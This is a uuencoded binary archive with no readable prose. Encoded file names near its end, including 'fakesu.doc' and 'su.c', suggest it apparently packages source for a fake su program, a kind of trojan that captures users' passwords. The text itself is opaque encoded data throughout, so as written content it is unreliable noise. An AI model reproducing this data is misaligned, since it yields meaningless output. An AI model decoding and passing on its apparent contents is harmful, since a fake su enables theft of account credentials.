M^_B^SA4E?V,I)9X;@*$NR8+&$CH%R,E?$UI(]`I5)%2JKE<[RI>1NCFZ/*C4 MQR;`)(P:,[RT''Y)5`^=N` M&5'I@_3VKUKQ#8-:#IEYP[(,\C(BVFU<2M,JP>9.8@'[A$D&"JFJ\-'8]BTS M1-?[C?R=_/J;6@J-N(FAH5FQ)5HV3E/85$'%\5U7/7=E?#-\TZ_U32U%&Q6K M'$V1?]>V<1?0ZYS/060'/X[J6J=:";6-Z"7U+NY;,_3;@I;9MKN7L$X8S0S3 M=X/HVG>_6$,1B6L:3F##-M<=+EE`HA'M^`S"L1G=6L;8\H-V?(+:37]\1WQH M@&+8Q9^/!+KS?^X7(8',(N(%A?UE>9)5$(4O?->/J2UN:O95\Z8M%]:0Z-X. M;Z/@$7HBNS\_EVU<2I,LQO#>EYFNO%!5;.<=^==T/55/UX.A8.4)+RF9SXRC M)(V?#=\!MOY)E0N5IJ]8_GN$GE*)BZ2H\!4*AK'$H&V'[44?54(??-VWZL_1 M3R=J`SA=`@&A$A='*^+,('8)DI(UAYJ!28@M('!SE3U?MA(D9R5\\T/&7BF9 M<;B79[':VL`S?/,CQ(SZRLXES=3G=\;#W[JRW;O^&)S:GD!#;QL]?EVGK?%%7:M>MO)-$DNPE%`[7#=HNW$9.G$R<>9H2`E]66^_9QHA[%\P M:(114Z39+BD_[P*=EFO&Q:AN:9IF!OT3.[Z4)%&V#]M6RV9&4]NQ-'HU4O]) MO4"IT'HX-0=@KR=2,9E80&!,KZ)'ZX-O^I'@P76#@7F!D M7U2%ZMY%01,&;3$NV,/V?->,YM[IA'O`AO)P!_-6G$)O4,1"U/D"S:1Z,?4% MJ'9X&--:*[@UQNY]=_+:>65G^"B28CO4?0>A9WJ/FA%F*S*^'*0\!E-W,J3Y M:%]=*KDN6@[7>%LEHQ6DRA[Z/(QNW2`<%O(*N5^QZAQ4[5[7FHWA&.UXR MN57.*P[>'PS-XJ,J>%5=D)]SEM#1KO@>S4VVB:%DN[Y]E->;HR7T%4QA^#J% MR:ED@#YR2@_Z2HAS\D&L/L'7F?B@4.%*)0O(N#3?=^[-D*Z&C`^8ECY\5/HT MC,YYDS./]G"\N+U`)Q95&[DW/J03R55O!,,U[D#\TLTED$9"-WSTNAD*@,N\ MBO9G"7]TCW?\/>"0=FHNBQY>*$UTXP14127RV]1PJN##>I) M<%%D^).GR'3GCB;+-<0<"^O@@5*#=$[5T"-D'0)L,5@M&FH0^K8SL6\T=>,% M9A\5KP/$:R.P],=(+PD?+F/7IJNK8LFJY'QP&\Q;WW4U&Y"4VV(8XC]Z&D:: M['JCP2TO)2TR#@/1`.9FZKJ^ MAM%S;-IFG&JWWAE@Z&23#D'`QN;]6$M):<;6&L[8FMHS+:F9B891]4,-+0L; MII-@_73\:X['&YGNF+F[W3'WP-LPSB6?QFEGV+SCOWW4R\9)B^M<( MZ.'P`/E?*R"Z+E^D\6#2PO`&#W9OQH8F=P$1ZFDI5A0*[#!Q'D`%O+6FTV$B M?":C7/)X"`=#7A@YH3OP)*EFL3.\VG;LL]R:B5@DC`VB`B,P;7N8@ZWR<-&8 M63/M[`,4?%XY3`DL33I<\W3P&,3=BHK!-';R"SOQM2$MO'EK.W;"6^,AIB('/FS03 M+]7)`5NNE4.0E>A`WV%_HN. M*&290+>)L_$@R3>AWS1G^F>VT"WJ2+>:6HH44>0Z3.`Y6D[]&YEAD.7[NHX* M2&\4 M^4U3=<(G;=&I=(EGKD\Y5S@;]AZJM7\,@E-A_T]!#E%%?(%]QSD\SZB[#QUT MD>1XBJ\#WIA..-7#H*\\0SJ870R]9#`O,/4X24.#F<$.`SVN.?+6XE3RU^+6 M<;*ZP/_..3&=&>9M_5_/J6F7BP_"]6+.U.^'M&*"MZ0O>AIXROCZ'!BZ'_C@ M643E?[:CQV;1_HFG!CJ-U.&>%EG$$NEQ>-86E_'Z#"(^\#-\8W865/#D]9Q<@]3`-;^T##/<`)5Y;7]0'@\#ZGR^00 M"&]/XL83W=#$#E'L),C68%[5[ZX.4.J#D[@O.-EID%P<\K@X"7/['V`?CCXM M@\';DRSH[W6P^MGK(4]]TOYN^Z.!```M`D```<`$`!EUX>4@S82!!0[JGAR M%WM,5G+6T>XFE%-__'VS&P@Y]7I]Z$MB[\[.?//-MS/>VR&VMK/]*>WN4LU5 MJZSRNC/4=#9N[5J>=]9KPIC/^VPRTN.KO1LWFIX1AI6&?\(1L3#U?GX[#..##X.+X?% MK:1P,2Q&YWE.%]=C&M#-8%P,SR:7@S'=3,8WU_EYGRAG@<7BX">,-J$H8*UF MKW3K8MJWJ*(#MK:FJ5HRJEFQ7@*9H@K:^?]*!4K;#KJ3)&&\IO&4=$.F\QD] M6`UQ^.ZG-0PKTMW4!O#9V/Q]?C\G/9VT+.C3:\7L'2RJ@LE5\5NBQ[ M>SM1"`TKOP`Z/*HEV%)WP`(9W%?5DVP<'?2/1.U133'V%DG.90F^SLJ2_J0# M^OZ=DN>%#Q^P\N;-D\75<`0\8G>4BF%9YL5X>%:4@U$^+`4X/4'?P)GD5PAAIOQV@/YU;K7Q#5Z>G+M0 M4*2NJHKG/MR^?Z=]W']'"3<-G$,K[2.63M+?1L5)NIEWQ(NM^+"Y&?%C,SZL M:=A:_8=*K^QK"9\7?R%\&D/'EYZ0=B,.(/L9.Z?N. M#8J,^OU^NGT:^EM0VFAR)6HQG?F;;9#(I)ON%#FJ4VRH?K_=R<(C#^!M=)/)1NKY3/WW#$T++3-:VB2%+. M0\TN(WG&LEG,,MQNXSQ54V5I)Q(;H5HB^,T_M..- M&)7"CW1*.?XTKI^'Q!S#?<9@TR%_YUG5L;HO&4YV(LQ*=I!_ MB^;\4@E8_E%UL/Q+GF'W?*>>VF3H*Z$U"M;*\HR-M`Q6%4:!GC%T*MZVQ4"R MYLU<-@H=XZZN7UEA+OA8IKP#'7#FZ`'7$GU,)DF85AC%,TP#U(976^O&$JE@I0X`BXHJ(>J"K2' M%M0D((00VMAC>XF]:^VLF_K2W\[,KI.T0`Z1]GGFO?EX\U%O$99KV`QP6QK[ M'J9@IJC4]=WE'&8M5>FYT#2`)G@S>3MY!UF6*759:ULAA!JATZ$&8\%9!%=& MJ"?TH//<]380(SK`X'JH]3T*C,2@B[@2G!#!$&<96TDYI7-2%O)G/>*@- M!><'*$V#-)'LV@302;PTGH)Z+M,U.LYL$X2\J4\`.F)3S.8J+/ MX><'";<*QE]V_';`2B/,:UDV=9B;TN2`]MYX9UNT(6I0T#[T'7`IE=+V<98M;C]>IY>>Y'UW&S.#\Y40H?.N<#[#'@!96MC.'I)5X9=_SOW65^L9=IAT-/)6B92?[WIX1G"W79\#K MCRMC*`8MU]-QDR8!D585QF,^&E0*D,X]QIH/'N@T$>^U`+'3T+$Y=WQ3.QY6 M-8E[7B5BMNLX++9!WQ2CGWNQ>VV*`@\^CK2ST';P1-_Y>%-1EGT3M+&4O.5< M.!;QRATN-('%ZU05G\9U&?O6I+B,B"```3A8```P`$`!L:6)G971T97AT+FA56`P`NZ/X,AG\^#+\`0`` MK5AK<]I(%OUL_8H;IVH&7!C;R]S;DL"\7"<[(XK`=1]^S[.?;;.3BA4T[DT1OYFF@&=GM)`IJF82_*$ M$:&>IS33":G8R"061NE8A.J_]D?3(:*.7JP2-0\,U3IUNOCPX8<&?_Y(-XF4 M--8SLQ2)I!N=Q;X]U:!>[#4=9Q*HE!:)GBLBFH?*H MKSP9IY($Y/)*&DB?IBN'R5_2MD5283^A9YFD>*9W#8+XFC"L84)ZP51U1\0K M"H79$!ZP<&.(#SRMEH%>0.\`W&#)4H4A325EJ9QE8<,!)7WL3>[N'R?4'C[1 MQ_9HU!Y.GEJ@-('&KGR6.1\5+4(%MM`^$;%9`05GT!UU[D#?ONKU>Y,G5ONF M-QEVQV.ZN1]1FQ[:HTFO\]AOC^CA=TI#D(MGEO#0+G!K45J1K$V#5HF"A%@ M-.VYR]D-K@;]\($F$IA(>@B%)^F4QAD??__^O$%7.C5,.FC3^;N+BXO3B_?G M/S7H<=R&_2=GCG-V0E?2$_`#P>.ICA"8J]1(1%=--N=-2`Y%HM(Z+:7=-BJ2 M:6XY%%2Q%V:^Y.Q@79N5_8Q8% M-P;$2(^-)#'5SQ*Z7B$$JA("*3@7(IN."YD$8I&2"%/-?'PY4[$DM]^[Z@TG M??>.4XF/)W+&(DOY,*`097G;8\J*9=("H;?PRIN]@WIHTU)X()=,5UEEZB($,;Q%F*?]WH`#* M+1UWCNG3FA#F_O(+X8'5A(]0G'FA\$?,/)#2[<&8Y3&_\>2ZX[IX*C'*MVLB MF2-V^1-[,D3VO4!28\\43BB4*"4-'_O]7,[:HQ4#.`PVR\!M6P\^3+7:LU8^ MG=3IO+ZO1TYR?E`!>I/#VW$'J&;MV^Z8L;'E]EF$F2U,Z`5@DUI?3R4B6]ER MG=>APL>UNLT!?_W($3'+8IME17Y5LI]\#88H1D6BL+S"2!!?YWHK8_->H_)A M3V2AR74JXJDTKZ([U4XOZIMH@"77TD-]L1&9=]]"P=,L5?'\%(T9"VG>DVP[GW#$@S!#7B`2 M.N&-EL.UIR"*LV@JDY;SN>54XKO3GB`="O`E)]92P]I$B6D(I$0BUT%0]#N1 M&1W!,.1`N$+OI84^-?@W#9NI]%GQN6T/W")M5?PWC#U5OJ7POL^U+Y(C5WC' ME/P'J'_]5ZLD5)5E-Y3QW`2M+;QO`'%%,\*Y1'AE08CR>2BM5/I8H\.)T'H: M_38-\^J!>(BE]&TX]*`GPV[`:&1RG#&5+R8R!3!L5UF"C^[L=:+VM@D MR$#^M$KVM?X/90L:C&][UR6>7I8D;'49:M'V[&:#IT+'"E[5G0#EF,-AZ+U;8?8V"EL*`H)LGPKL-@/RJ_76PZK MQUZ$XOI^T.X-A^U!]W]&8=<4_Q5;?$2,BF,1R09]C97^JV96.#I'^'N)[9^` M`B%[N[?WHR>&XV4(O/\/@]P,FX$N%)%SG:SV[U!8E0@Y03/PK#,D$,\#Y\Z/N8S*:NAJ9)(7%^.RP)S?`!_1B6W_75D M]G#='/X:8,NX&B^DA[M5/C&]$E/EE<46CGQ:I>O>R-*BB@?V9B;B,CJ+/II' M&V%D%S05Z:&X0[ORO\7VPU'AJ^0@,-OM=\CZ$AK0X?ZT&#^)ZWR3-01RKE1F]#::QY:M61,OG`P1?.J+B`VY2NB."1 M9?*Q45GZ"[-@P6O^Y1RRGJ**)D[??4>U?*4<<3'#V>?K3K&"1K09T,JA:6!K MTM%1B0_1/QW[M:Z>-9[E<-VRA%46Z\'KNE)$*ORVV:T1VB=O5.MY+@+V[0Z@ M;.+Z]^4EO:LL#'K#^Q&6?[ZDG];#Y#S44XP#Y41#FWF/`SK4PD?902HT/:"* MFP@W?\Q]?.-HL-++0-H4$-A9;G(&[N"S$FHO`^4%]CW'E-]+I-I3=O:Q]V#, M2#L31KJ5*;;8Q:$=;<#<]6*3M*SQ:X"]%Q%N4*>LDEM(UUR7V:UB$2N`3M M)5;P<=W68=IU7V`/0'3&HW-!O2%F!=_0#D=.@P-'Z[ M@QM4Y?_--F^QV@V\K=W/=;Y&EO=(*B^2]L:YN9)M%[12Z&;_"]7J`/%79=[^ MN4U7JD+`=0+U!]=A0FW"I![P?:)ZG]SN:%M"KXL6]2*3G1<,4SE7]N(C%VK[ M%)E#36,[,4B:0;G<6^/=6@7NPU'6<2J)06 MB9XG(B+\G#%]6M"W:*4S:!!3(GV5FD1-,R-)&1*Q?P9](NVKVF9?;@=/M*MC&4B0GK(IJ'RJ*\\&:>2!.3R2AI(GZ8KA\E?TK9%4F$_ MH6>9I'BF=PV"^)HPK&%">L%4=4?$*PJ%V1`>L'!CB`\\K9:!7D#O`-Q@R5*% M(4TE9:F<96'#`25][$WN[A\GU!X^T3IY:H#2!QJY\ECD?%2U"!;;0 M/A&Q60$%9]`==>Y`W[[J]7N3)U;[IC<9=L=CNKD?49L>VJ-)K_/8;X_HX7'T M<#_N-HG&DA62SA?PFUG\`9,OC5!A"E.?X*T4*H4^!>)9PFN>5,]02)"'`'G= M*0Y"+9Y;PT"YP:U%:D:Q-@U:)@H18#3MNRAA9[KRM[*VY M89O]]%&6)U$KA.^KO$(!DFBJ0S8F57->L$FVM,E5AJ)%EW&.9&QL^'"""73%=99>HB!#&\19BG_=Z``RBT==X[ITYH0YO[R"^&!U82/4)QYH?!' MS#R0TNW!F.4QO_'DNN.Z>"HQRK=K(IDC=OD3>S)$]KU`4F//%$XHE"@E#1_[ M_5S.VJ,5`S@,-LO`;5L//DRUVK-6/IW4Z;R^KT=.F+K[2S1$2OP-Q6AD:^P&L^_K]2> M7`WTH0SY[4;IW$7L.Y]PQ(,P0UX@$CKAC9;#M:<@BK-H*I.6\[GE5.*[TYX@ M'0KP)2?64L/:1(EI"*1$(M=!4/0[D1D=P3#D0+A"[Z6%/C7X-PV;J?19\;EM M#]PB;57\-XP]5;ZE\+[/M2^2(U=XQY3\!ZA__5>K)%2593>4\=P$K2V\;P!Q M13/"N41X94&(\GDHK53Z6*/#B=!Z&OTV#?/J@7B(I?1M./2@',IQ7I\-NP&A MD]A.+Z?M#N#8?M0?=_1F'7%/\56WQ$ MC(IC$V?@`(A>[NW]Z,GAN-E"+S_#X/<#)N!+A21 M[53XQO1)3Y97% M%HY\6J7KWLC2HHH']F8FXC(ZBSZ:1QMA9!FAN$.[\K_%]L-1X:OD(##; MW+\EZKX@P?;%[K!]A9%OV!_G6.87!7K7?(^A(:T.'^M!@_B>M\DS4$6K5D3+YP,$7SJBX@-N4KHC@D67RL5%9^@NS8,%K_N4Y7#=LH15%NO! MZ[I21"K\MMFM$=HG;U3K>2X"]NT.H&SB^O?E);VK+`QZP_L1EG^^I)_6P^0\ MU%.,`^5$0YMYCP,ZU,)'V4$J-#V@BIL(-W_,?7SC:+#2RT#:%!#866YR!N[@ MLQ)J+P/E!?8]QY3?2Z3:4W;VL?=@S$@[$T:ZE2FVV,6A'6W`W/5BD[2L\6N` MO1<1;E"GK));2-=9"@V2 MSN:1B(V[H"*&#CB=Z-.NM".,4SRGK256\''=UF':=5]@#T!TQJ-S0;TA9@7? MT`Y'3H,#1^G-Y1[X]9+10;7Y;Y?WY2&B2JR#I%;Q7;U18H4?G4V7VQ>SK^^^ MNJT=R9_W=2[]R:>_!'2A]QX'^\4WNX,;5.7_S39OL=H-O*W=SW6^1I;W2"HO MDO;&N;F2;1>T4NAF_PO5Z@#Q5V7>_KE-5ZI"P'4"]0?784)MPJ0>\'VB>I_< M[FA;0J^+%O4BDYT7#%,Y5_;B(Q=J^Q7#[EN*SYM+>?[]!U!+`P04````"``A M?$4B.1&0DW`'``!6$@``!``0`'-U+F-56`P`WJ/X,H[\^#+\`0``A5AM;]LV M$/Y<_XJKBS:2X[<`PX`E\S`C29L,61SD9<.0!)XB4;86B=1(RJY7Y+_OCJ0L MR=8P(VVLX]W#X[T\1^5#PL.TB!AT0\'C9#%<=CL?2MF/2D>)&"Y_JHD63(M< M-V5JHT9ZDS/5%.?K:,=6YDU!P1/<8@=,RX0OFE!=W$&SC)SK?(A8G'`&][>S M7Z;7\[/+6^B.EB)CHT(Q.1IJ)K,1Z24Q6-7(NYC^=CZ_^^/N:O9E?N'#IT]M M*W[S1*E8&!]8JAB,>O"^`0*]$>V`,.!$=P^GI^=W=YT/!6^3,AXE\8[)Y^GE MUYBE&^F]Q=W\XMZ M)@.]M!FQ\!T$OE\RH(B#%O#"0DP`X(Y<8&H2!2IG81(G+!J""95+VMGYY^G# MU?W\X>X^T:2#H!H7 M-85/]=/UX5B*`4K'=-*5;46,AHB.-QB0V//'1');/46R8K9P@N%E`RS6MH8 M"/15;N#F=_(.QI:>J+2W6-2/@LI>O5(E-;_;NSQ=``U+1@ M`EM:[-XXW&/H(BD!.>8U="=MVRWD M<\Z"L6%LJ>@'>TSO)_`V.X4&Z(Q*Q'.ESYT[S$)?WY4,!A0D1^8,&=" M-BAM^(1%UGEG?*RSHCD9C>#&*#W@1M83YW39<`7S-03BV.,/Y:7+32<*$2-"REP!N"#X;9`$QG1 M/NC]4X?^`0SZ,$CQW\"R5O.3!:\6WLZEDMK,DS,/R9:XA\AG`#>*FN4>Y"=62"EWC;]\!9034 M1C,(%`EJ*Z!%#?6E52"3X"5ERH'D+5Z4'T4S$WMJD#EE13L:IR9W%^=75W5E MZDHKI#L.T^'(*&)L<&JO%23:@M#'%EW+CN5T-8/:Z)3#KVYB#7-&>$U:[POS]3P4^886/E]>G4,/4T)#ID(D+ZTR M$FK$4KO::?(+[DCG?1P_FZ7ZU-XZTYBZ5HKB]1+QP/,H0):7\=N<+A+@V7@2 M,-)?>!RG6:Z.D8#*:T;?AKWG(VGZR'K(GN>SSTVF5MC*X1(,/NI\Z[P+\>X* MXV-BR1>\H;ZB&U:&5Q$CK<*.1KC[28MJ;%5W#GK4III:U;WSMRIGI&R_Y@=M M/BJ'YO+&SE'6*[OWJIA949.[?+AM\\%58#W4?DX&`SQ=\M& MH>]'PZ/OJ]:RK3'V3UKV(%:P&SAO2,TIT/410_VCZ1UZHWR/]1EFN4G^ZM$N M/^-V@ZZ_D]B6>-J5PT-K5C7NWDX6JM:`M=T.#Y]/_MMFO_O(%`ZAW),Z8^UN M&&OL#?#*;;;7"UK?'?35G#<>X2B.!+(<\1K&5FF3@`82OK'E:QH0G@TGWOZ^ M,%V[1>$ERI[1]?H$=N]2E>4IDH"9T::;J?JW]RW<`ID7[W'F783:OWHMQ5N= M#?ICXV;Z[#9W9#*)1LN@.#$J/_&/ZMC581F&?NUT MKO+B,!6*;>%(2`5@#WG&4H:O0CCW.-U3R]?*6(J,YMCK>^NU([D)56*@/?J5 M;SS/TJ$/]CW74\D_3,1>]?<3__`[OU_[>PH^=$?*#1#),K%BGH,V(G?$;L)W M;]UX2#->_@502P,$%`````@`.WQ%(GX#O_0T"0``3Q<```@`$`!S>7-T96TN M:%58#`#MH_@RPOSX,OP!``"-6']OVD@3_OO-IYCVI`(5$$B::_/F>I)#(/&5 M`#+0-M(K<<9>8%7C15X[*=)]^/>9M<$&`KVV4'8\OW=VYEF?OR>]UK%8UGRQ M$J$OPIA\,9.AC*4*-(7-Q+444GHNVR@2G;HU<]8VV@A MM_H)/V1G":Q(!F3&_KG\'&I?#E;LQ[0H%U$%"\$ MQ2)::E(SL[COC>E>A")R`QHDTT!ZU)6>"+4@%Z:9@E!]FAH]+'',[1L2$L\C M>A:1QIH0,YPHNS'[&9%:,5>%U;CAF@(WSGE?CS8/RB<9&N,+M4(`"^A$2"\R M"&@J*-%BE@155@%F^F:/'OKC$5F])_IF.8[5&SW=@#E>*#P5SR)5)9>K0$(S MPHC<,%XC(ZSAL>VT'B!BW=I=>_3$(73L4:\]'%*G[Y!%`\L9V:UQUW)H,'8& M_6&[3C04[)9@!2D(^PS.7/%33 MKW?*I#10X=P$">8\C3J:1@(I$C0(7$]0 MC88):[B\;%3I5NF8"_71HL9%L]FL-2\;'ZLT'EK(Q?OSL[/S]ZPF2'S!1^D\ M7J^$KB^P63,.WW@XDX'(N'^3&>\?S*QC-ZXO_F3R#,>.AB-K-'FT6DY_.+EU M^E_:O;/?3#GCT<0>WG:_[*Q;#\[.^L[>77?L3G^'T.WM*G@]EM@0-]`ZI&'0_>W4<\V,IW'$528'B.R-36:'QOXDVEB;GJ3`^?^LD?^NX9SC-!YX9&CQ[&)R/OQ\XAZCNXF#U"V;7=)B!'G<[,K2)BF,,%@L;]/OK:=H=WOG7D+-Z+WDVH[SBE1.I8NM%+R^4V$IYGE/4QZ-;XC& M^+T4RZ7"X$1D&D@#PPH`"#NF8QF:L49+%V,46"-P5V;$0<+CRVA9<&W*Y&)[']F/?>3(\^9Y"MXK69D\IJ[G\(0.: M<)YN.#;J\)'F9^G6LI.+J+!OQ4$IHBA41D^62T,X$S^!JD(HC5/"S7XI%N/8 MM>X'Q>)'2Q,CHV0UP^U!OU*\8U"HXK!-OD5TQJ%9[68B0M22:/3N?RO#<\QAW MSO$?`]H-=)W+9^8`X'=#+3>`FM&GJ@(`!JPD#0$G1&\PY93Q5J22^6(362!_ M"+*'`Q3XB&,GVR#?G1)G^)UVQ"HC1IA,8N6I<`:,JAFVRQF#9P/%&5$:N^9H MI39\6JY031&]J`@:98R`W1\6#?QPW^`2YR-F0I\/H=O M30'<1DFHZ,&54Z!=U_>+==%)(FX2C-JK\"=9K414]BHD8J^>PG5LA\%^G"L$ MII,@YH[A@9NU8..T]%-7<,^8`TDWZ8_/>(ZOBZNK.O51$4@WBF$5I^E*L7IN MC?68O*$>!">&KP2\SW]S19:JIDH,J,:_EXAO`ID'[-VGVE2:O.3E^^=G:EY\ MHI>%1"'BD"-WHT]-(>J M4IC\&$BMT=.@/;GK/UIVC[>EN>T[QWDR(YS7O:8F]31PPQ\%:>!G"]`*4N4] M3<1$N)G)\+)R8+P@SE^`""7\Y9BSU?_B4A&:I$[@XK9:%+7<.];@X;031N:( M$_]"?!7QR,B6;Z36*[[S9>JR'&WUF<;Q+_55"G)6MS=^/"WG!F&R/)0;/%B_ MDELMW'TY3">G>UH.TRH*]N6Z_6]MY[1ZU=Y24+O("_#@=5J MGY8K[L=6SIS`TW*F@^S+?;^S[^U?./K3EW-YX*D1G'3[+:O["X<+XOPN()4D M%!(:/[_'4LL]=55N&NC+R"SZ+WI-C6QN*]'I,%V?JPJ3,0FY7YG70O$- MOPHR@R94<65]]HPRSF*80!D(TEP9W-->_,C*5DR:_ZQ$\T24Q\A?E4 ME$7'E1[&++"`B]&=ZATH+7]2L]&XK%_4FM?7%Z31#LWKK_I5_:+>I)6+GG_5 MP-0-,>Z:5U>_U_#U*04+&P1A($:I4=J.JM)UR2`)DT>-&3TP,W.;R5CMY0\Q M!T+K]&T?O)7+%08C#SNP,F+F`10H!"!*NO`ZDV?)W\9**7TWQG!D\RYKH=#1 M?06_.;<\_E6T9(4F[!0U[U5'VNPV&U`Q%5$SH6'>75<*-YS)(,76`Z<_ZG,1 M,2#=="T\+5O17%>(OQE*ITWM\'FYD@/M_*8P;L8-LU2`:>:2V-Z*VB/4HF\OVJ^E+%`N852F@/[5ZEK".8.R5-];?*4 MSQIJ]ZQ;6(5?!;MO`<"E0<]O<^V3\@A3N<)#.L8/2I?;'I^^=8*8ST]]M<00 MSH5WZ>4[\U^5[F2$&H6C>PYFVE[3=*!E7W3/7?[>1/Q_4$L!`A4#%`````@` M+R)$(G7:3PX=#```.3````@`#````````0``0*2!`````&-O;F9I9RYH55@( M`).C^#*Z#/YN^Z.!```M`D```<`#``````` M`0``0*2!4PP``&5R3X("``#.!```"@`,```````!``!`I($6$0``9F%K97-U+F1O8U58"`!/ MJ?@R3ZGX,E!+`0(5`Q0````(`.-[12*[JQGC(@@``$X6```,``P```````$` M`$"D@=`3``!L:6)G971T97AT+FA56`@`NZ/X,AG\^#)02P$"%0,4````"`#H M>T4BNZL9XR((``!.%@``"0`,```````!``!`I($L'```;&EB:6YT;"YH55@( M`,RC^#(C_/@R4$L!`A4#%`````@`(7Q%(CD1D)-P!P``5A(```0`#``````` M`0``0*2!A20``'-U+F-56`@`WJ/X,H[\^#)02P$"%0,4````"``[?$4B?@._ M]#0)``!/%P``"``,```````!``!`I($G+```